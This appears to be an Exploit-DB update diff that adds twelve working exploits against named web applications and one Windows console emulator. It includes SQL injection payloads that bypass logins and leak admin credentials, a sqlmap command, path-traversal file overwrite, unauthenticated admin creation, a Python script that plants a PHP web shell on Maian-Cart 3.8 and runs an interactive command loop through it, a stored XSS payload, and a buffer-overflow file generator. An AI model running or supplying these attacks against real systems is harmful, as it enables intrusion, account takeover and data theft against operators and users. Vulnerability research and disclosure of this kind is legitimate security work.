DB: 2021-10-09

12 changes to exploits/shellcodes

Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial-of-Service (PoC)
IFSC Code Finder Project 1.0 - SQL injection (Unauthenticated)
Online Traffic Offense Management System 1.0 - Privilage escalation (Unauthenticated)
django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)
Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)
WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated)
Simple Online College Entrance Exam System 1.0 - Unauthenticated Admin Creation
Simple Online College Entrance Exam System 1.0 - Account Takeover
Simple Online College Entrance Exam System 1.0 - 'Multiple' SQL injection
Online Enrollment Management System 1.0 - Authentication Bypass
Online Employees Work From Home Attendance System 1.0 - SQLi Authentication Bypass
Loan Management System 1.0 - SQLi Authentication Bypass

exploits/php/webapps/50391.txt

@@ -0,0 +1,40 @@
+# Title: IFSC Code Finder Project 1.0 - SQL injection (Unauthenticated)
+# Exploit Author: Yash Mahajan
+# Date: 2021-10-07
+# Vendor Homepage: https://phpgurukul.com/ifsc-code-finder-project-using-php/
+# Version: 1
+# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=14478
+# Tested On: Windows 10, XAMPP
+# Vulnerable Parameter: searchifsccode
+
+Steps to Reproduce:
+
+1) Navigate to http://127.0.0.1/ifscfinder/ enter any number in search field and capture request in burpsuite.
+2) Paste below request into burp repeater and also create a txt file and paste this request.
+
+Request:
+========
+POST /ifscfinder/search.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 79
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/ifscfinder/
+Cookie: PHPSESSID=5877lg2kv4vm0n5sb8e1eb0d0k
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+searchifsccode=')+AND+(SELECT+3757+FROM+(SELECT(SLEEP(20)))lygy)--+fvnT&search=
+
+--------------------------------------------------------------------------------
+3) You will see a time delay of 20 Sec in response.
+4) python sqlmap.py -r request.txt -p searchifsccode --dbs
+5) We can retrieve all databases using above sqlmap command

exploits/php/webapps/50392.txt

@@ -0,0 +1,295 @@
+# Exploit Title: Online Traffic Offense Management System 1.0 - Privilage escalation (Unauthenticated)
+# Date: 07/10/2021
+# Exploit Author: Hubert Wojciechowski
+# Contact Author: snup.php@gmail.com
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
+# Version: 1.0
+# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+
+### Privilage escalation
+
+# All requests can be sent by both an authenticated and a non-authenticated user
+
+# The vulnerabilities in the application allow for:
+
+* Reading any PHP file from the server
+* Saving files to parent and child directories and overwriting files in server
+* Performing operations by an unauthenticated user with application administrator rights
+
+-----------------------------------------------------------------------------------------------------------------------
+# POC
+-----------------------------------------------------------------------------------------------------------------------
+
+## Example 1 - Reading any PHP file from the server
+
+Example vuln scripts:
+http://localhost/traffic_offense/index.php?p=
+http://localhost/traffic_offense/admin/?page=
+
+# Request reading rrr.php file from other user in serwer
+
+GET /traffic_offense/index.php?p=../phpwcms2/rrr HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+
+-----------------------------------------------------------------------------------------------------------------------
+# Response
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 10:09:35 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Connection: close
+[...]
+</br></br>Hacked file other user in serwer!</br></br>
+[...]
+
+-----------------------------------------------------------------------------------------------------------------------
+
+## Example 2 - Saving files to parent and child directories and overwriting files in server
+
+# Request to read file
+
+GET /traffic_offense/index.php HTTP/1.1
+Host: localhost
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Connection: close
+
+-----------------------------------------------------------------------------------------------------------------------
+# Response
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 10:30:56 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Set-Cookie: PHPSESSID=330s5p4flpokvjpl4nvfp4dj2t; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Connection: close
+Content-Type: text/html; charset=UTF-8
+Content-Length: 15095
+
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1">
+  	<title>Online Traffic Offense Management System - PHP</title>
+[...]
+
+-----------------------------------------------------------------------------------------------------------------------
+# Request to overwrite file index.php in main directory webapp
+
+POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------329606699635951312463334027403
+Content-Length: 1928
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4
+Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------329606699635951312463334027403
+Content-Disposition: form-data; name="id"
+
+5/../../../index
+-----------------------------329606699635951312463334027403
+Content-Disposition: form-data; name="license_id_no"
+
+GBN-1020061
+-----------------------------329606699635951312463334027403
+Content-Disposition: form-data; name="lastname"
+
+Blake
+-----------------------------329606699635951312463334027403
+Content-Disposition: form-data; name="firstname"
+
+Claire
+-----------------------------329606699635951312463334027403
+Content-Disposition: form-data; name="middlename"
+
+C
+-----------------------------329606699635951312463334027403
+Content-Disposition: form-data; name="dob"
+
+1992-10-12
+-----------------------------329606699635951312463334027403
+Content-Disposition: form-data; name="present_address"
+
+Sample Addss 123
+-----------------------------329606699635951312463334027403
+Content-Disposition: form-data; name="permanent_address"
+
+Sample Addess 123
+-----------------------------329606699635951312463334027403
+Content-Disposition: form-data; name="civil_status"
+
+Married
+-----------------------------329606699635951312463334027403
+Content-Disposition: form-data; name="nationality"
+
+Filipino
+-----------------------------329606699635951312463334027403
+Content-Disposition: form-data; name="contact"
+
+09121789456
+-----------------------------329606699635951312463334027403
+Content-Disposition: form-data; name="license_type"
+
+Non-Professional
+-----------------------------329606699635951312463334027403
+Content-Disposition: form-data; name="image_path"
+
+uploads/drivers/
+-----------------------------329606699635951312463334027403
+Content-Disposition: form-data; name="img"; filename="fuzzdb.php"
+Content-Type: image/png
+
+<?php
+echo "Hacked other client files in this hosting!";
+?>
+-----------------------------329606699635951312463334027403--
+
+# New file have extention as this write filename="fuzzdb.php"
+# New file have name and locate 5/../../../index we can save file in other directory ;)
+# Line must start digit
+# We can rewrite config files
+
+-----------------------------------------------------------------------------------------------------------------------
+# Respopnse
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 10:38:35 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Content-Length: 20
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+{"status":"success"}
+
+-----------------------------------------------------------------------------------------------------------------------
+# Request to read file index.php again
+
+GET /traffic_offense/index.php HTTP/1.1
+Host: localhost
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Connection: close
+
+-----------------------------------------------------------------------------------------------------------------------
+# Response
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 10:42:17 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Access-Control-Allow-Origin: *
+Content-Length: 42
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+Hacked other client files in this hosting!
+
+-----------------------------------------------------------------------------------------------------------------------
+## Example 4 - Performing operations by an unauthenticated user with application administrator rights
+
+# The application allows you to perform many operations without authorization, the application has no permission matrix. The entire application is vulnerable
+# Request adding new admin user to application by sending a request by an authorized user
+
+POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: */*
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685
+Content-Length: 949
+Origin: http://localhost
+Connection: close
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------210106920639395210803657370685
+Content-Disposition: form-data; name="id"
+
+21
+-----------------------------210106920639395210803657370685
+Content-Disposition: form-data; name="firstname"
+
+hack
+-----------------------------210106920639395210803657370685
+Content-Disposition: form-data; name="lastname"
+
+hack
+-----------------------------210106920639395210803657370685
+Content-Disposition: form-data; name="username"
+
+hack
+-----------------------------210106920639395210803657370685
+Content-Disposition: form-data; name="password"
+
+hack
+-----------------------------210106920639395210803657370685
+Content-Disposition: form-data; name="type"
+
+1
+-----------------------------210106920639395210803657370685
+Content-Disposition: form-data; name="img"; filename="aaa.php"
+Content-Type: application/octet-stream
+
+<?php
+phpinfo();
+?>
+
+-----------------------------210106920639395210803657370685--
+
+-----------------------------------------------------------------------------------------------------------------------
+# Response
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 10:50:36 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Set-Cookie: PHPSESSID=2l1p4103dtj3j3vrod0t6rk6pn; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Content-Length: 1
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+1
+
+# The request worked fine, log into the app using your hack account

exploits/php/webapps/50394.py

@@ -0,0 +1,120 @@
+# Exploit title: Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)
+# Date: 27.11.2020 19:35
+# Tested on: Ubuntu 20.04 LTS
+# Exploit Author(s): DreyAnd, purpl3
+# Software Link: https://www.maiancart.com/download.html
+# Vendor homepage: https://www.maianscriptworld.co.uk/
+# Version: Maian Cart 3.8
+# CVE: CVE-2021-32172
+
+#!/usr/bin/python3
+
+import argparse
+import requests
+from bs4 import BeautifulSoup
+import sys
+import json
+import time
+
+parser = argparse.ArgumentParser()
+parser.add_argument("host", help="Host to exploit (with http/https prefix)")
+parser.add_argument("dir", help="default=/ , starting directory of the
+maian-cart instance, sometimes is placed at /cart or /maiancart")
+args = parser.parse_args()
+
+#args
+
+host = sys.argv[1]
+directory = sys.argv[2]
+
+#CREATE THE FILE
+
+print("\033[95mCreating the file to write payload to...\n\033[00m", flush=True)
+time.sleep(1)
+
+try:
+    r = requests.get(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=shell.php&target=l1_Lw")
+    print(r.text)
+    if "added" in r.text:
+        print("\033[95mFile successfully created.\n\033[00m")
+    else:
+        print("\033[91mSome error occured.\033[00m")
+
+except (requests.exceptions.RequestException):
+    print("\033[91mThere was a connection issue. Check if you're
+connected to wifi or if the host is correct\033[00m")
+
+#GET THE FILE ID
+
+time.sleep(1)
+
+file_response = r.text
+soup = BeautifulSoup(file_response,'html.parser')
+site_json=json.loads(soup.text)
+hash_id = [h.get('hash') for h in site_json['added']]
+file_id =  str(hash_id).replace("['", "").replace("']", "")
+
+
+print("\033[95mGot the file id: ", "\033[91m", file_id , "\033[00m")
+print("\n")
+
+#WRITE TO THE FILE
+
+print("\033[95mWritting the payload to the file...\033[00m")
+print("\n")
+time.sleep(1)
+
+headers = {
+    "Accept": "application/json, text/javascript, /; q=0.01",
+    "Accept-Language" : "en-US,en;q=0.5",
+    "Content-Type" : "application/x-www-form-urlencoded; charset=UTF-8",
+    "X-Requested-With" : "XMLHttpRequest",
+    "Connection" : "keep-alive",
+    "Pragma" : "no-cache",
+    "Cache-Control" : "no-cache",
+}
+
+data = f"cmd=put&target={file_id}&content=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%20%3F%3E"
+
+try:
+    write = requests.post(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder",
+headers=headers, data=data)
+    print(write.text)
+except (requests.exceptions.RequestException):
+    print("\033[91mThere was a connection issue. Check if you're
+connected to wifi or if the host is correct\033[00m")
+
+
+#EXECUTE THE PAYLOAD
+
+print("\033[95mExecuting the payload...\033[00m")
+print("\n")
+time.sleep(1)
+
+exec_host = f"{host}{directory}/product-downloads/shell.php"
+
+print(f"\033[92mGetting a shell. To stop it, press CTRL + C. Browser
+url: {host}{directory}/product-downloads/shell.php?cmd=\033[00m")
+time.sleep(2)
+
+while True:
+    def main():
+        execute = str(input("$ "))
+        e = requests.get(f"{exec_host}?cmd={execute}")
+        print(e.text)
+
+    try:
+        if __name__ == "__main__":
+            main()
+    except:
+        exit = str(input("Do you really wish to exit? Y/N? "))
+
+        if exit == "Y" or exit =="y":
+            print("\033[91mExit detected. Removing the shell...\033[00m")
+            remove =
+requests.get(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=rm&targets%5B%5D={file_id}")
+            print("\033[91m" , remove.text, "\033[00m")
+            print("\033[91mBye!\033[00m")
+            sys.exit(1)
+        else:
+            main()

exploits/php/webapps/50395.txt

@@ -0,0 +1,12 @@
+# Exploit Title: WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated)
+# Google Dork: inurl:/plugins/pie-register/
+# Date: 08.10.2021
+# Exploit Author: Lotfi13-DZ
+# Vendor Homepage: https://wordpress.org/plugins/pie-register/
+# Software Link: https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip
+# Version: <= 3.7.1.4
+# Tested on: ubuntu
+
+Vulnerable arg: [user_id_social_site=1] <== will return the authentications cookies for user 1 (admin).
+
+Exploit: wget -q -S -O - http://localhost/ --post-data 'user_id_social_site=1&social_site=true&piereg_login_after_registration=true&_wp_http_referer=/login/&log=null&pwd=null' > /dev/null

exploits/php/webapps/50396.txt

@@ -0,0 +1,20 @@
+# Exploit Title: Simple Online College Entrance Exam System 1.0 - Unauthenticated Admin Creation
+# Date: 07.10.2021
+# Exploit Author: Amine ismail @aminei_
+# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
+# Version: 1.0
+# Tested on: Windows 10, Kali Linux
+# Unauthenticated admin creation
+
+Unauthenticated admin creation:
+
+    Request:
+        POST /entrance_exam/Actions.php?a=save_admin HTTP/1.1
+        Host: 127.0.0.1
+        Content-Length: 42
+
+        id=&fullname=admin2&username=admin2&type=1
+
+    PoC to create an admin user named exploitdb and password exploitdb:
+    curl -d "id=&fullname=admin&username=exploitdb&type=1&password=916b5dbd201b469998d9b4a4c8bc4e08" -X POST 'http://127.0.0.1/entrance_exam/Actions.php?a=save_admin'

exploits/php/webapps/50397.txt

@@ -0,0 +1,39 @@
+# Exploit Title: Simple Online College Entrance Exam System 1.0 - Account Takeover
+# Date: 07.10.2021
+# Exploit Author: Amine ismail @aminei_
+# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
+# Version: 1.0
+# Tested on: Windows 10, Kali Linux
+# Unauthenticated password change leading to account takeover
+
+Explanation: By setting the parameter old_password as array, the MD5 function on it returns null, so md5($old_password) == $_SESSION['password'] since we have no session, thus bypassing the check, after that we can use SQLI and inject our custom data.
+
+    Request:
+        POST /entrance_exam/Actions.php?a=update_credentials HTTP/1.1
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        Content-Length: 129
+
+        id=4&username=test',`password`='916b5dbd201b469998d9b4a4c8bc4e08'+WHERE+admin_id=4;%23&password=commented_out&old_password[]=test
+
+    Vulnerable code in Actions.php:
+        function update_credentials(){
+            extract($_POST);
+            $data = "";
+            foreach($_POST as $k => $v){
+                if(!in_array($k,array('id','old_password')) && !empty($v)){
+                    if(!empty($data)) $data .= ",";
+                    if($k == 'password') $v = md5($v);
+                    $data .= " `{$k}` = '{$v}' ";
+                }
+            }
+            ...
+            if(!empty($password) && md5($old_password) != $_SESSION['password']){
+                $resp['status'] = 'failed';
+                $resp['msg'] = "Old password is incorrect.";
+            }else{
+                $sql = "UPDATE `admin_list` set {$data} where admin_id = '{$_SESSION['admin_id']}'";
+                @$save = $this->query($sql);
+
+    PoC that changes the password and username of user 'admin' to 'exploitdb':
+        curl -d "username=exploitdb',%60password%60='916b5dbd201b469998d9b4a4c8bc4e08' WHERE admin_id=1;%23&password=useless&old_password[]=useless" -X POST 'http://127.0.0.1/entrance_exam/Actions.php?a=update_credentials'

exploits/php/webapps/50398.txt

@@ -0,0 +1,16 @@
+# Exploit Title: Simple Online College Entrance Exam System 1.0 - 'Multiple' SQL injection
+# Date: 07.10.2021
+# Exploit Author: Amine ismail @aminei_
+# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
+# Version: 1.0
+# Tested on: Windows 10, Kali Linux
+# Multiple SQL injections
+
+The following PoCs will leak the admin username and password:
+
+Unauthenticated:
+    http://127.0.0.1/entrance_exam/take_exam.php?id=%27+UNION+SELECT+1,username||%27;%27||password,3,4,5,6,7+FROM+admin_list;
+
+Admin:
+    http://127.0.0.1/entrance_exam/admin/view_enrollee.php?id=1'+UNION+SELECT+1,2,3,4,5,6,password,username,9,10,11,12,13,14,15+FROM+admin_list;

exploits/php/webapps/50399.txt

@@ -0,0 +1,21 @@
+# Exploit Title: Online Enrollment Management System 1.0 - Authentication Bypass
+# Date: 07.10.2021
+# Exploit Author: Amine ismail @aminei_
+# Vendor Homepage: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html
+# Software Link: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html
+# Version: 1.0
+# Tested on: Windows 10, Kali Linux
+# Admin panel authentication bypass
+
+Admin panel authentication can be bypassed due to a SQL injection in the login form:
+
+Request:
+  POST /OnlineEnrolmentSystem/admin/login.php HTTP/1.1
+  Host: 127.0.0.1
+  Content-Length: 63
+  Cookie: PHPSESSID=jd2phsg2f7pvv2kfq3lgfkc98q
+
+  user_email=admin'+OR+1=1+LIMIT+1;--+-&user_pass=admin&btnLogin=
+
+PoC:
+  curl -d "user_email=admin' OR 1=1 LIMIT 1;--+-&user_pass=junk&btnLogin=" -X POST http://127.0.0.1/OnlineEnrolmentSystem/admin/login.php

exploits/php/webapps/50400.txt

@@ -0,0 +1,31 @@
+# Exploit Title: Online Employees Work From Home Attendance System 1.0 - SQLi Authentication Bypass
+# Date: 08.10.2021
+# Exploit Author: Merve Oral
+# Vendor Homepage: https://www.sourcecodester.com/php/14981/online-employees-work-home-attendance-system-php-and-sqlite-free-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14981&title=Online+Employees+Work+From+Home+Attendance+System+in+PHP+and+SQLite+Free+Source+Code
+# Version: 1.0
+# Tested on: Windows 10, Kali Linux
+# Online Employees Work From Home Attendance System/Logs in a Web App v1.0 Login page can be bypassed with a simple SQLi to the username parameter.
+
+Steps To Reproduce:
+1 - Go to the login page http://localhost/audit_trail/login.php
+2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field.
+3 - Click on "Login" button and you are logged in as administrator.
+
+PoC
+
+POST /wfh_attendance/Actions.php?a=login HTTP/1.1
+Host: merve
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 40
+Origin: http://merve
+Connection: close
+Referer: http://merve/wfh_attendance/admin/login.php
+Cookie: PHPSESSID=55nnlgv0kg2qaki92o2s9vl5rq
+
+username=admin'+or+'1'%3D'1&password=any

exploits/php/webapps/50402.txt

@@ -0,0 +1,31 @@
+# Exploit Title: Loan Management System 1.0 - SQLi Authentication Bypass
+# Date: 08.10.2021
+# Exploit Author: Merve Oral
+# Vendor Homepage: https://www.sourcecodester.com/php/14471/loan-management-system-using-phpmysql-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14471&title=Loan+Management+System+using+PHP%2FMySQL+with+Source+Code
+# Version: 1.0
+# Tested on: Windows 10, Kali Linux
+# Loan Management System Login page can be bypassed with a simple SQLi to the username parameter.
+
+Steps To Reproduce:
+1 - Go to the login page http://localhost/audit_trail/login.php
+2 - Enter the payload to username field as "admin' or '1'='1'#" without double-quotes and type anything to password field.
+3 - Click on "Login" button and you are logged in as administrator.
+
+PoC
+
+POST /loan/ajax.php?action=login HTTP/1.1
+Host: merve
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 44
+Origin: http://merve
+Connection: close
+Referer: http://merve/loan/login.php
+Cookie: PHPSESSID=911fclrpoa87v9dsp9lh28ck0h
+
+username=admin'+or+'1'%3D'1'%23&password=any

exploits/python/webapps/50393.txt

@@ -0,0 +1,56 @@
+# Exploit Title: django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)
+# Date: 10/7/21
+# Exploit Author: Raven Security Associates, Inc. (ravensecurity.net)
+# Software Link: https://pypi.org/project/django-unicorn/
+# Version: <= 0.35.3
+# CVE: CVE-2021-42053
+
+django-unicorn <= 0.35.3 suffers from a stored XSS vulnerability by improperly escaping data from AJAX requests.
+
+Step 1: Go to www.django-unicorn.com/unicorn/message/todo
+Step 2: Enter an xss payload in the todo form (https://portswigger.net/web-security/cross-site-scripting/cheat-sheet).
+
+
+POC:
+
+POST /unicorn/message/todo HTTP/2
+Host: www.django-unicorn.com
+Cookie: csrftoken=EbjPLEv70y1yPrNMdeFg9pH8hNVBgkrepSzuMM9zi6yPviifZKqQ3uIPJ4hsFq3z
+Content-Length: 258
+Sec-Ch-Ua: "";Not A Brand"";v=""99"", ""Chromium"";v=""94""
+Sec-Ch-Ua-Mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
+Content-Type: text/plain;charset=UTF-8
+Accept: application/json
+X-Requested-With: XMLHttpRequest
+X-Csrftoken: EbjPLEv70y1yPrNMdeFg9pH8hNVBgkrepSzuMM9zi6yPviifZKqQ3uIPJ4hsFq3z
+Sec-Ch-Ua-Platform: ""Linux""
+Origin: https://www.django-unicorn.com
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: https://www.django-unicorn.com/examples/todo
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+
+{""id"":""Q43GSmJh"",""data"":{""task"":"""",""tasks"":[]},""checksum"":""4ck2yTwX"",""actionQueue"":[{""type"":""syncInput"",""payload"":{""name"":""task"",""value"":""<img src=x onerror=alert(origin)>""}},{""type"":""callMethod"",""payload"":{""name"":""add""},""partial"":{}}],""epoch"":1633578678871}
+
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+
+HTTP/2 200 OK
+Date: Thu, 07 Oct 2021 03:51:18 GMT
+Content-Type: application/json
+X-Frame-Options: DENY
+X-Content-Type-Options: nosniff
+Referrer-Policy: same-origin
+Via: 1.1 vegur
+Cf-Cache-Status: DYNAMIC
+Expect-Ct: max-age=604800, report-uri=""https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct""
+Report-To: {""endpoints"":[{""url"":""https:\/\/a.nel.cloudflare.com\/report\/v3?s=b4nQavto8LK9ru7JfhbNimKP71ZlMtduJTy6peHCwxDVWBH2Mkn0f7O%2FpWFy1FgPTd6Z6FmfkYUw5Izn59zN6kTQmjNjddiPWhWCWZWwOFiJf45ESQxuxr44UeDv3w51h1Ri6ESnNE5Y""}],""group"":""cf-nel"",""max_age"":604800}
+Nel: {""success_fraction"":0,""report_to"":""cf-nel"",""max_age"":604800}
+Server: cloudflare
+Cf-Ray: 69a42b973f6a6396-ORD
+Alt-Svc: h3="":443""; ma=86400, h3-29="":443""; ma=86400, h3-28="":443""; ma=86400, h3-27="":443""; ma=86400
+
+{""id"": ""Q43GSmJh"", ""data"": {""tasks"": [""<img src=x onerror=alert(origin)>""]}, ""errors"": {}, ""checksum"": ""ZQn54Ct4"", ""dom"": ""<div unicorn:id=\""Q43GSmJh\"" unicorn:name=\""todo\"" unicorn:key=\""\"" unicorn:checksum=\""ZQn54Ct4\"">\n<form unicorn:submit.prevent=\""add\"">\n<input type=\""text\"" unicorn:model.lazy=\""task\"" placeholder=\""New task\"" id=\""task\""/>\n</form>\n<button unicorn:click=\""add\"">Add</button>\n<p>\n<ul>\n<li><img src=x onerror=alert(origin)></li>\n</ul>\n<button unicorn:click=\""$reset\"">Clear all tasks</button>\n</p>\n</div>\n"", ""return"": {""method"": ""add"", ""params"": [], ""value"": null}}"
+"ENDTEXT"

exploits/windows/local/50401.txt

@@ -0,0 +1,24 @@
+# Exploit Title: Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial-of-Service (PoC)
+# Date: 2021-10-07
+# Exploit Author: Aryan Chehreghani
+# Vendor Homepage: https://cmder.net
+# Software Link: https://github.com/cmderdev/cmder/releases/download/v1.3.18/cmder.zip
+# Version: v1.3.18
+# Tested on: Windows 10
+
+# [About - Cmder Console Emulator] :
+
+#Cmder is a software package created over absence of usable console emulator on Windows.
+#It is based on ConEmu with major config overhaul, comes with a Monokai color scheme, amazing clink (further enhanced by clink-completions) and a custom prompt layout.
+
+# [Security Issue] :
+
+#equires the execution of a .cmd file type and The created file enters the emulator ,That will trigger the buffer overflow condition.
+#E.g  λ cmder.cmd
+
+# [POC] :
+
+PAYLOAD=chr(235) + "\\CMDER"
+PAYLOAD = PAYLOAD * 3000
+with open("cmder.cmd", "w") as f:
+f.write(PAYLOAD)

files_exploits.csv

@@ -11396,6 +11396,7 @@ id,file,description,date,author,type,platform,port
 50336,exploits/windows/local/50336.py,"Cyberfox Web Browser 52.9.1 - Denial-of-Service (PoC)",1970-01-01,"Aryan Chehreghani",local,windows,
 50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows,
 50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",1970-01-01,"Kiran Ghimire",local,linux,
+50401,exploits/windows/local/50401.txt,"Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial-of-Service (PoC)",1970-01-01,"Aryan Chehreghani",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
